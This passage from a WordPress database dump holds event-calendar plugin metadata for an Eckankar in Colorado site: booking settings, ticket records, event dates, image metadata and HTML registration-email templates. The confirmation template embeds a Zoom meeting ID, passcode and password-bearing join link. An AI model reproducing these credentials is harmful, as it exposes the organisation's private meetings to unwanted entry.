limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(186232,268726,'mec_tickets','a:1:{i:1;a:20:{s:4:\"name\";s:24:\"Title of Event Goes Here\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:2:\"id\";i:1;}}'),(186233,268726,'mec_fees_global_inheritance','1'),(186234,268726,'mec_fees','a:0:{}'),(186235,268726,'mec_ticket_variations_global_inheritance','1'),(186236,268726,'mec_ticket_variations','a:0:{}'),(186237,268726,'mec_reg_fields_global_inheritance','1'),(186238,268726,'mec_reg_fields','a:0:{}'),(186239,268726,'mec_bfixed_fields','a:0:{}'),(186240,268726,'mec_op','a:0:{}'),(186241,268726,'mec_fields','a:0:{}'),(186242,268726,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:10264:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 0px; padding-left: 0px;\" align=\"center\"><img style=\"outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; clear: both; display: inline-block !important; border: none; height: auto; float: none; width: 100%; max-width: 480px;\" title=\"\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"480\" align=\"middle\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<p><span style=\"font-size: 20pt; font-weight: bold;\">Event Registration Confirmation</span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 17px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 26px; font-size: 16px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 24px; color: #f28a27; font-weight: 600;\">Zoom Login Information:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 15px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">See you there!</p>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:8368:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif; background-color: #efefef;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px;\">Admin Notification</span></div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div style=\"text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n<div style=\"text-align: center;\"><br />\r\n<span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span>\r\n<p> <span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></p>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\"><span style=\"font-size: 14pt;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}}'),(186243,268726,'mec_event_status','EventScheduled'),(186244,268726,'mec_moved_online_link',''),(186245,268726,'mec_cancelled_reason',''),(186246,268726,'mec_display_cancellation_reason_in_single_page',''),(186247,268726,'protect_children',''),(186248,268726,'passster_activate_global_protection',NULL),(186249,268726,'passster_activate_protection',NULL),(186250,268726,'passster_protection_type','password'),(186251,268726,'boldgrid_hide_page_title','0'),(186252,268726,'_thumbnail_id','266472'),(186253,268726,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(186254,268726,'boldgrid_in_page_containers','1'),(186256,268726,'_dp_original','266544'),(186257,268726,'_edit_lock','1688008353:2'),(186258,268726,'passster_area_shortcode',''),(186259,268726,'_edit_last','2'),(186260,268726,'mec_cost_auto_calculate','0'),(186261,268726,'mec_style_per_event','global'),(186262,268726,'mec_trailer_url',''),(186263,268726,'mec_trailer_title',''),(186264,268726,'mec_start_datetime','2027-08-15 10:30 AM'),(186265,268726,'mec_end_datetime','2027-08-15 11:30 PM'),(186266,268726,'mec_sequence','5'),(186267,268726,'mec_event_gallery','a:0:{}'),(186268,268726,'mec_related_events','a:0:{}'),(186269,268726,'mec_banner','a:0:{}'),(193178,269160,'passster_activate_global_protection',''),(193179,269160,'passster_activate_protection',''),(193180,269160,'passster_protection_type','password'),(193181,269160,'boldgrid_in_page_containers','1'),(193182,269160,'_dp_original','265240'),(193183,269160,'_edit_lock','1696377514:15'),(193184,269160,'passster_area_shortcode',''),(193185,269160,'_edit_last','15'),(193186,269160,'_wp_old_date','2023-01-14'),(193187,269160,'mec_cost_auto_calculate','0'),(193188,269160,'mec_style_per_event','global'),(193189,269160,'mec_trailer_url',''),(193190,269160,'mec_trailer_title',''),(193191,269160,'mec_start_datetime','2023-10-12 06:30 PM'),(193192,269160,'mec_end_datetime','2023-10-12 07:30 PM'),(193193,269160,'mec_sequence','15'),(193194,269160,'mec_event_gallery','a:0:{}'),(193162,269160,'mec_tickets','a:0:{}'),(193163,269160,'mec_fees_global_inheritance','1'),(193164,269160,'mec_fees','a:0:{}'),(193165,269160,'mec_ticket_variations_global_inheritance','1'),(193166,269160,'mec_ticket_variations','a:0:{}'),(193167,269160,'mec_reg_fields_global_inheritance','1'),(193168,269160,'mec_reg_fields','a:0:{}'),(193169,269160,'mec_bfixed_fields','a:0:{}'),(193170,269160,'mec_op','a:0:{}'),(193171,269160,'mec_fields','a:0:{}'),(193172,269160,'mec_event_status','EventScheduled'),(193173,269160,'mec_moved_online_link',''),(193174,269160,'mec_cancelled_reason',''),(193175,269160,'mec_display_cancellation_reason_in_single_page',''),(193176,269160,'boldgrid_hide_page_title','0'),(193177,269160,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(193195,269160,'mec_related_events','a:0:{}'),(193196,269160,'mec_banner','a:0:{}'),(193197,269161,'_wp_attached_file','2023/10/MountainSide.webp'),(193198,269161,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:338;s:4:\"file\";s:25:\"2023/10/MountainSide.webp\";s:8:\"filesize\";i:33988;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"MountainSide-348x196.webp\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9310;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"MountainSide-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3310;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"MountainSide-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:9310;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:25:\"MountainSide-500x338.webp\";s:5:\"width\";i:500;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:22468;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"MountainSide-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:16530;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"MountainSide-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12084;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"MountainSide-300x338.webp\";s:5:\"width\";i:300;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:12002;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(186342,268730,'mec_color',''),(186343,268730,'mec_location_id','129'),(186344,268730,'mec_dont_show_map','0'),(186345,268730,'mec_organizer_id','1'),(186346,268730,'mec_read_more',''),(186347,268730,'mec_more_info',''),(186348,268730,'mec_more_info_title',''),(186349,268730,'mec_more_info_target','_self'),(186350,268730,'mec_cost',''),(186351,268730,'mec_currency','a:0:{}'),(186352,268730,'mec_additional_organizer_ids','a:0:{}'),(186353,268730,'mec_additional_location_ids','a:0:{}'),(186354,268730,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-09-10\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-09-10\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(186355,268730,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(186356,268730,'mec_certain_weekdays','a:0:{}'),(18635